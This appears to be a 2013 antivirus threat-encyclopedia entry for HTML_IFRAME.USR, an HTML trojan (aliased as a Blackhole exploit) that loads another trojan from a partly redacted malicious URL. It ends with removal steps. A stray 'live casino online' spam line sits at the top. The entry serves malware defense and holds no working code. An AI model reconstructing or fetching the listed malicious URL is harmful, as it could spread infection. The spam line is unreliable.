live casino online

arrow_back
search
close

HTML_IFRAME.USR

July 08, 2013
 Analysis by: Alvin Bacani
 ALIASES:

JS/Exploit-Blacole.b!heur (NAI)

 PLATFORM:

Windows 2000, Windows Server 2003, Windows XP (32-bit, 64-bit), Windows Vista (32-bit, 64-bit), Windows 7 (32-bit, 64-bit)

 OVERALL RISK RATING:
 DAMAGE POTENTIAL:
 DISTRIBUTION POTENTIAL:
 REPORTED INFECTION:

  • Threat Type: Trojan

  • Destructiveness: No

  • Encrypted: No

  • In the wild: Yes

  OVERVIEW

Infection Channel:

Downloaded from the Internet


This Trojan arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.

  TECHNICAL DETAILS

File Size:

342 bytes

File Type:

HTML, HTM

Initial Samples Received Date:

01 Jul 2013

Payload:

Connects to URLs/IPs

Arrival Details

This Trojan arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.

NOTES:

This malware loads the Trojan TROJ_PIDIEF.USR from the following site:

  • http://{BLOCKED}otel.net/news/severe-table_directs.php?gpmcg=2v:33:2w:1n:1m&ekcoej=m&gmfsm=1j:1i:1g:1l:2v:33:32:1i:2v:1h&lwanwsb=1f:1d:1f:1d:1f:1d:1f

  SOLUTION

Minimum Scan Engine:

9.300

FIRST VSAPI PATTERN FILE:

10.128.09

FIRST VSAPI PATTERN DATE:

01 Jul 2013

VSAPI OPR PATTERN File:

10.129.00

VSAPI OPR PATTERN Date:

01 Jul 2013

Step 1

Before doing any scans, Windows XP, Windows Vista, and Windows 7 users must to allow full scanning of their computers.

Step 2

Remove the malware/grayware file dropped/downloaded by HTML_IFRAME.USR